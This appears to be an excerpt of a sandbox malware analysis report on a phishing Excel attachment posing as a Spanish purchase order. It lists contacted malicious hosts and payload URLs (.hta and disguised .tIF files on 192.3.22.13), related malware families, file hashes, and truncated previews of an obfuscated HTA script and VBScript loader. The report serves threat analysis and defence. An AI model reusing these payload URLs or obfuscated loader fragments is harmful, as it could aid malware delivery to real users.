https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f	false		high
http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.hta	true	Avira URL Cloud: safe	unknown
http://192.3.22.13/352/WRFFRF.txt	true	Avira URL Cloud: safe	unknown
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIF	true	Avira URL Cloud: safe	unknown
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S	powershell.exe, 0000000E.00000002.546084174.0000000002622000.00000004.00000800.00020000.00000000.sdmp	false		high
http://192.3.22.13/xampp/se/seet	powershell.exe, 00000005.00000002.501953877.0000000002481000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000005.00000002.505604190.00000000122B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://account.dyn.com/	AddInProcess32.exe, 00000012.00000002.641003530.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://crl.entrust.net/server1.crl0	mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.entrust.net03	mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000005.00000002.505604190.00000000122B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000005.00000002.505604190.00000000122B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://provit.uk/	mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://1017.filemail.com	powershell.exe, 0000000E.00000002.546084174.0000000002622000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.diginotar.nl/cps/pkioverheid0	mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://provit.uk/v	mshta.exe, 00000004.00000002.481189241.0000000000558000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.htarisationM	mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://go.micros	powershell.exe, 00000005.00000002.501953877.000000000363E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFdll	powershell.exe, 00000005.00000002.501876958.00000000020E9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFC:	powershell.exe, 00000005.00000002.501876958.0000000002167000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://1017.filemail.com/api/file/get?filekey=2	powershell.exe, 0000000E.00000002.545365008.00000000001D5000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFp	powershell.exe, 00000005.00000002.501953877.0000000002481000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://provit.uk/b	mshta.exe, 00000004.00000002.481189241.0000000000558000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.hta...p	mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000005.00000002.505604190.00000000122B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000005.00000002.505604190.00000000122B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.hta;	mshta.exe, 00000004.00000002.481189241.0000000000513000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.htahttp://192.3.22.13/	mshta.exe, 00000004.00000003.478779442.0000000002E05000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ip-api.com	AddInProcess32.exe, 00000012.00000002.643424873.0000000002321000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000012.00000002.643424873.00000000023D8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000012.00000002.643424873.00000000023BC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.htaAcC:	mshta.exe, 00000004.00000003.479097372.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003E95000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net0D	mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000005.00000002.501953877.0000000002281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.641719503.000000000232C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.546084174.0000000002421000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000012.00000002.643424873.0000000002321000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000012.00000002.643424873.00000000023BC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.comodo.com/CPS0	mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://1017.filemail.com/api/file/get?filek	powershell.exe, 0000000C.00000002.641719503.00000000027F4000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://192.3.22.13/	mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/2048ca.crl0	mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.215.209.78	ip.1017.filemail.com	Canada	32156	HUMBER-COLLEGECA	false
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
198.244.140.41	provit.uk	United States	18630	RIDLEYSD-NETUS	false
192.3.22.13	unknown	United States	36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1559093
Start date and time:	2024-11-20 07:48:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx renamed because original name is a hash value
Original Sample Name:	Envo de Orden de Compra No. 43456435344657.xla.xlsx
Detection:	MAL
Classification:	mal100.phis.troj.spyw.expl.evad.winXLSX@23/34@5/4
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 94% Number of executed functions: 35 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
Execution Graph export aborted for target mshta.exe, PID 3540 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:49:57	API Interceptor	52x Sleep call for process: mshta.exe modified
01:50:00	API Interceptor	338x Sleep call for process: powershell.exe modified
01:50:11	API Interceptor	5x Sleep call for process: wscript.exe modified
01:50:16	API Interceptor	77x Sleep call for process: AcroRd32.exe modified
01:50:32	API Interceptor	9x Sleep call for process: AddInProcess32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
142.215.209.78	bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, SmokeLoader	Browse
	#U3010TW-S PO#U3011PO#3311-20241118003.xls	Get hash	malicious	HTMLPhisher, SmokeLoader	Browse
	seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse
	Order_Summary.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse
	kissmegoodthingwhichgivemebestthignswithgirluaremy.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse
	bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot, Strela Stealer	Browse
	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse
	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse
	SAMPLE_PHOTO.js	Get hash	malicious	AgentTesla	Browse
	Document.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse
208.95.112.1	file.exe	Get hash	malicious	Unknown	Browse	ip-api.com/line/
	file.exe	Get hash	malicious	Unknown	Browse	ip-api.com/line/
	FACTER9098767800.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	[Purchase Order] PO2411024.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	Wire slip account payable.pif.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	file.exe	Get hash	malicious	Clipboard Hijacker	Browse	ip-api.com/line/
	XSLHv0kxy7.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	oaUNY8P657.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	IAdjMfB2A5.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	dkKMw0OlZ9.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip.1017.filemail.com	bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, SmokeLoader	Browse	142.215.209.78
	#U3010TW-S PO#U3011PO#3311-20241118003.xls	Get hash	malicious	HTMLPhisher, SmokeLoader	Browse	142.215.209.78
	seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	142.215.209.78
	Order_Summary.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	142.215.209.78
	kissmegoodthingwhichgivemebestthignswithgirluaremy.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	142.215.209.78
	bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot, Strela Stealer	Browse	142.215.209.78
	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
	SAMPLE_PHOTO.js	Get hash	malicious	AgentTesla	Browse	142.215.209.78
	Document.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse	142.215.209.78
ip-api.com	file.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	file.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	paket teklif.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	FACTER9098767800.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	[Purchase Order] PO2411024.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	Wire slip account payable.pif.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	file.exe	Get hash	malicious	Clipboard Hijacker	Browse	208.95.112.1
	XSLHv0kxy7.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	oaUNY8P657.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	IAdjMfB2A5.exe	Get hash	malicious	XWorm	Browse	208.95.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HUMBER-COLLEGECA	bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, SmokeLoader	Browse	142.215.209.78
	#U3010TW-S PO#U3011PO#3311-20241118003.xls	Get hash	malicious	HTMLPhisher, SmokeLoader	Browse	142.215.209.78
	seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	142.215.209.78
	Order_Summary.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	142.215.209.78
	kissmegoodthingwhichgivemebestthignswithgirluaremy.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	142.215.209.78
	bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot, Strela Stealer	Browse	142.215.209.78
	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
	SAMPLE_PHOTO.js	Get hash	malicious	AgentTesla	Browse	142.215.209.78
	Document.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse	142.215.209.78
TUT-ASUS	file.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	file.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	http://ok.clicknowvip.com	Get hash	malicious	Unknown	Browse	162.252.214.5
	paket teklif.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	FACTER9098767800.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	[Purchase Order] PO2411024.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	Wire slip account payable.pif.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	file.exe	Get hash	malicious	Clipboard Hijacker	Browse	208.95.112.1
	XSLHv0kxy7.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	oaUNY8P657.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
AS-COLOCROSSINGUS	9srIKeD54O.rtf	Get hash	malicious	Unknown	Browse	192.3.101.150
	exe009.exe	Get hash	malicious	Emotet	Browse	75.127.14.170
	bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, SmokeLoader	Browse	107.172.44.178
	givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	192.3.243.136
	seemybestbeautifulgirlwhowantbestthignsenitrelifetimethingstobe.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	192.3.243.136
	#U3010TW-S PO#U3011PO#3311-20241118003.xls	Get hash	malicious	HTMLPhisher, SmokeLoader	Browse	107.172.44.178
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	192.3.243.136
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	192.3.243.136
	seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	192.227.228.36
	FRSSDE.exe	Get hash	malicious	Remcos	Browse	192.227.228.36
RIDLEYSD-NETUS	nabspc.elf	Get hash	malicious	Unknown	Browse	198.244.7.173
	https://instagrambeta.github.io/	Get hash	malicious	HTMLPhisher	Browse	198.244.231.90
	SecuriteInfo.com.Trojan.WinGo.Agent.27329.6060.exe	Get hash	malicious	Unknown	Browse	198.244.179.42
	Informations.bat	Get hash	malicious	PureLog Stealer, XWorm	Browse	198.244.206.37
	Beopajki.exe	Get hash	malicious	HVNC, PureLog Stealer, XWorm	Browse	198.244.206.37
	Your_New_Social_Security_Statement.wsf	Get hash	malicious	XWorm	Browse	198.244.251.236
	http://www.loroc.co.uk/	Get hash	malicious	Unknown	Browse	198.244.213.27
	ODggSYsZP2.elf	Get hash	malicious	Unknown	Browse	198.244.7.172
	at0jsDxjXS.elf	Get hash	malicious	Unknown	Browse	198.244.66.83
	SecuriteInfo.com.Trojan.Siggen21.29401.5442.21101.exe	Get hash	malicious	Unknown	Browse	198.244.148.151

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	Xkl0PnD8zFPjfh1.wiz.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	142.215.209.78
	#U3010TW-S PO#U3011PO#3311-20241118003.xls	Get hash	malicious	HTMLPhisher, SmokeLoader	Browse	142.215.209.78
	Order_Summary.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	142.215.209.78
	INV-#000497053.doc	Get hash	malicious	Unknown	Browse	142.215.209.78
	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
	Document.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse	142.215.209.78
	http://xoilacxd.cc	Get hash	malicious	Unknown	Browse	142.215.209.78
	Order_Confirmation.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	142.215.209.78
	Po docs.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
7dcce5b76c8b17472d024758970a406b	PO-73375.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	198.244.140.41
	PO-000041492.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	198.244.140.41
	#U3010TW-S PO#U3011PO#3311-20241118003.xls	Get hash	malicious	HTMLPhisher, SmokeLoader	Browse	198.244.140.41
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	198.244.140.41
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	198.244.140.41
	Order_Summary.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	198.244.140.41
	Signert kontrakt og faktura.xls	Get hash	malicious	Unknown	Browse	198.244.140.41
	New order.xls	Get hash	malicious	Unknown	Browse	198.244.140.41
	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	198.244.140.41
	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	198.244.140.41

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	4742
Entropy (8bit):	4.8105940880640246
Encrypted:	false
SSDEEP:	96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
MD5:	278C40A9A3B321CA9147FFBC6BE3A8A8
SHA1:	D795FC7D3249F9D924DC951DA1DB900D02496D73
SHA-256:	4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
SHA-512:	E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
Malicious:	false
Preview:	PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthingswithgreatsituationshandletotheprogress[1].hta

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with very long lines (65536), with no line terminators
Category:	modified
Size (bytes):	182577
Entropy (8bit):	2.0025860419599777
Encrypted:	false
SSDEEP:	48:4vahW5oZz7eWLB2CCz7lRo7dmz7lOwo7dO81bBPW1zKfD299Ddaq6bWyxf9DZRDf:4vCl17nuYMiFeAqfoqyWyflRJm0cfQ
MD5:	01928C833C9940A6896666A9D93B9670
SHA1:	ABE22DD055A6FA39C615CF72818E474F2525E7AE
SHA-256:	FA54825B8B94917037CC1620EB21421F9BD31AC394F396C1FE80546E4ED88DFA
SHA-512:	E34BC23996AB1EC12117E463F8B8EC5B4E880635D435286D3E4D09C8499C044DD2F92D8C2927E1435287691AE14DC1E1F7331C2AEAE103CA9AC56022B9D883E0
Malicious:	true
Yara Hits:	Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthingswithgreatsituationshandletotheprogress[1].hta, Author: Joe Security
Preview:	<script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253Cscript%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%252522%2525253C%25252521DOCTYPE%25252520html%2525253E%2525250A%2525253Cmeta%25252520http-equiv%2525253D%25252522X-UA-Compatible%25252522%25252520content%2525253D%25252522IE%2525253DEmulateIE8%25252522%25252520%2525253E%2525250A%2525253Chtml%2525253E%2525250A%2525253Cbody%2525253E%2525250A%2525253CsCripT%25252520typE%2525253D%25252522tEXT/vBscRipt%25252522%2525253E%2525250ADim%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethebestthingsentiretimewithgreatthingswithloverkiss[1].tiff

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (381), with CRLF line terminators
Category:	dropped
Size (bytes):	142098
Entropy (8bit):	3.6737957798783647
Encrypted:	false
SSDEEP:	3072:AFdRjwsHv2A7n6J7V5VmnldvvMnKjggt5pMGwm:SdP2A7nC8nr
MD5:	2A43F3918D91622E9CCAC7889F3E6DC2
SHA1:	7D6131261E7F6A54291BD9E02EB7C985E093CFA7
SHA-256:	95F59C4235C1D4516B7D5DE5A768F0F00C4A64C73A5BE26FB26496AC5F378E9B
SHA-512:	422B39ACB1DCACC05938EE122FA614A9A429E28A6A7F7ECF8A7F8416823B0E7ADA11C28B7FE52AE1352D85FC99423FFDB16FD85EC2AC27F25A2F3ADFED7B638C
Malicious:	false
Preview:	..........F.u.n.c.t.i.o.n. .d.e.s.c.a.b.i.d.o.(.B.y.V.a.l. .e.s.p.i.n.e.t.a.,. .B.y.V.a.l. .m.a.l.h.a.d.o.,. .B.y.V.a.l. .c.o.n.u.b.i.a.l.)..... . . . .D.i.m. .d.e.s.c.o.a.l.h.o..... . . . .d.e.s.c.o.a.l.h.o. .=. .I.n.S.t.r.(.e.s.p.i.n.e.t.a.,. .m.a.l.h.a.d.o.)..... . . . ..... . . . .D.o. .W.h.i.l.e. .d.e.s.c.o.a.l.h.o. .>. .0..... . . . . . . . .e.s.p.i.n.e.t.a. .=. .L.e.f.t.(.e.s.p.i.n.e.t.a.,. .d.e.s.c.o.a.l.h.o. .-. .1.). .&. .c.o.n.u.b.i.a.l. .&. .M.i.d.(.e.s.p.i.n.e.t.a.,. .d.e.s.c.o.a.l.h.o. .+. .L.e.n.(.m.a.l.h.a.d.o.).)..... . . . . . . . .d.e.s.c.o.a.l.h.o. .=. .I.n.S.t.r.(.d.e.s.c.o.a.l.h.o. .+. .L.e.n.(.c.o.n.u.b.i.a.l.).,. .e.s.p.i.n.e.t.a.,. .m.a.l.h.a.d.o.)..... . . . .L.o.o.p..... . . . ..... . . . .d.e.s.c.a.b.i.d.o. .=. .e.s.p.i.n.e.t.a.....E.n.d. .F.u.n.c.t.i.o.n.............p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .R.e.a.d.S.t.d.I.n.(.)..... . . . .w.h.i.l.e. .N.o.t. .s.t.d.I.n...A.t.E.n.d.O.f.S.t.r.e.a.m..... . . . . . . . .R.e.a.d.S.t.d.I.n. .=. .R.e.a.d.S.t.d.I.n. .&. .

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\11E2C553.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	3064680
Entropy (8bit):	1.8507381356738084
Encrypted:	false
SSDEEP:	6144:NaeRlcBvLukyV6kTCVQKERludvLuk0Vgk9CVX:oeRlM7kmERlyDku
MD5:	93774BB9AECD3837D6496AE965D1BD80
SHA1:	AE60D6A30E74BB5BE492CA71B82205D5C6B850C4
SHA-256:	6CDB58A3C6906A6DD49DB83340ACC7AF0B7C7BBA5C01D8B0A9F562AEBDC85897
